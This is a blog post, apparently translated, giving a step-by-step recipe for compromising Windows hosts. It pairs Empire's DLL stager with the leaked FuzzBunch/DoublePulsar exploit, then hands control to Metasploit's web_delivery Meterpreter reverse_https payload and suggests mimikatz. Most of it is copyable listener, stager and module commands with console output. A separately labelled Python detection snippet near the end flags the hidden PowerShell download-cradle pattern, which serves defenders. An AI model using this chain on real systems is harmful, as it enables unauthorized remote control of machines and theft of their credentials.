Using Empire to Bridge Metasploit and the FuzzBunch Toolkit Released by the ShadowBrokers

The FuzzBunch release by the ShadowBrokers caused a huge stir. Every Windows version from XP to 8 was affected; a real bloodbath. Naturally I had to try it too, and it really was good. But I ran into a problem while using the tools: a DLL implant generated directly by msfvenom, once implanted into Windows 7, would cause Windows to reboot. For a Metasploit fan like me that was unacceptable, but there was nothing to be done.

Later, as all kinds of exploitation techniques kept appearing, I realized that besides DanderSpritz, Empire can also generate the implant.

Empire, https://www.powershellempire.com/, is a PowerShell implant controller. Because it is PowerShell, it mostly evades antivirus.

Installing Empire is basically just cloning the repository and then running

sudo ./setup/install.sh  
sudo ./empire  

1. Generating the implant with Empire

First create a listener

listeners  
set Name Eternalblue  
set Host http://10.11.1.16  
set Port 5555  
set DefaultDelay 0  
execute  

Then generate the implant

usestager dll Eternalblue  
set Arch x64  
set OutFile /var/www/html/launcher.dll  
execute  

2. Delivering the implant to the target with FuzzBunch

Installing, configuring and using FuzzBunch is not covered here; there are already plenty of articles about it. Finally, use DoublePulsar to deliver the implant to the target; within a few seconds you should see the implant connect back to the controller.
After that you can use Empire for control, but that is not the focus of this article, since I am a Metasploit fan after all.

3. Handing over control with the Invoke-MetasploitPayload module

The official address of the Invoke-MetasploitPayload module is: https://github.com/jaredhaight/Invoke-MetasploitPayload

First set up the listener in Metasploit

use exploit/multi/script/web_delivery  
set SRVHOST 0.0.0.0  
set SRVPORT 4444  
set SSL true  
set target 2  
#2 is for PowerShell
set payload windows/meterpreter/reverse_https  
set LHOST 0.0.0.0  
set LPORT 4444  
run -j  

Metasploit starts the listener

msf exploit(web_delivery) > run -j  
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://10.211.55.4:4444/
[*] Using URL: http://0.0.0.0:4444/posh-payload
[*] Local IP: http://10.211.55.4:4444/xxxxxx
[*] Server started.

Then do the handover in Empire, passing the initiative to Metasploit

(Empire) > usemodule code_execution/invoke_metasploitpayload
(Empire: code_execution/invoke_metasploitpayload) > info

           Name: Invoke-MetasploitPayload
         Module: code_execution/invoke_metasploitpayload
     NeedsAdmin: False
      OpsecSafe: True
   MinPSVersion: 2
     Background: False
OutputExtension: None

Authors:  
  @jaredhaight

Description:  
  Spawns a new, hidden PowerShell window that downloads and
  executes a Metasploit payload. This relies on
  the exploit/multi/scripts/web_delivery metasploit module.

Options:

  Name  Required    Value                     Description
  ----  --------    -------                   -----------
  URL   True                                  URL from the Metasploit web_delivery    
                                              module                                  
  Agent True                                  Agent to run Metasploit payload on.     

(Empire: code_execution/invoke_metasploitpayload) > set URL http://10.211.55.4:4444/xxxxxx
(Empire: code_execution/invoke_metasploitpayload) > execute

As you can see, it is just a matter of assigning Metasploit's Local URL to URL. After execute, Metasploit gets control. Then run whatever commands you want, for example load mimikatz, haha. That's it.
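From the defender's side, the handover described above has a recognizable shape in process-creation telemetry: the agent's PowerShell spawns a hidden PowerShell window that fetches a payload from a bare-IP URL on an unusual port. The following Python is an added example, not code from the original post or from the Empire or Metasploit projects; it scores constructed Sysmon-style events against those indicators, and the field names and sample lines are assumptions.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style, reduced to three
# fields). The first mirrors the handover on this page: the Empire agent's
# PowerShell spawns a hidden PowerShell that fetches the web_delivery URL.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://10.211.55.4:4444/xxxxxx')\""},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\rotate-logs.ps1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -c \"Invoke-WebRequest "
                "https://updates.example.com/agent.msi -OutFile C:\\Temp\\a.msi\""},
]

# PowerShell accepts any unambiguous prefix of -WindowStyle (-w, -win, ...).
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden", re.IGNORECASE)
# URL whose host is an IP literal, optionally with an explicit port (4444 above).
IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/", re.IGNORECASE)
# Common in-memory download primitives: nothing touches disk before execution.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.IGNORECASE)

def _is_powershell(path: str) -> bool:
    return path.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")

def score_event(event: dict) -> list:
    """Return the indicator names matched by one process-creation event."""
    if not _is_powershell(event["image"]):
        return []
    cmd = event["cmdline"]
    reasons = []
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden-window")
    if IP_URL.search(cmd):
        reasons.append("ip-literal-url")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download-cradle")
    if _is_powershell(event["parent"]):
        reasons.append("powershell-spawned-powershell")
    return reasons

def triage(events, threshold=2):
    """(index, reasons) for events that match at least `threshold` indicators."""
    scored = [(i, score_event(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in scored if len(r) >= threshold]
```

A single indicator (the legitimate installer download in the third event) stays below the default threshold, while the handover event trips all four.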

Please cite the source when reprinting: https://story.tonylee.name/2017/05/05/li-yong-empireqiao-jie-metasploithe-shadowbrokerfa-bu-de-fuzzbunch/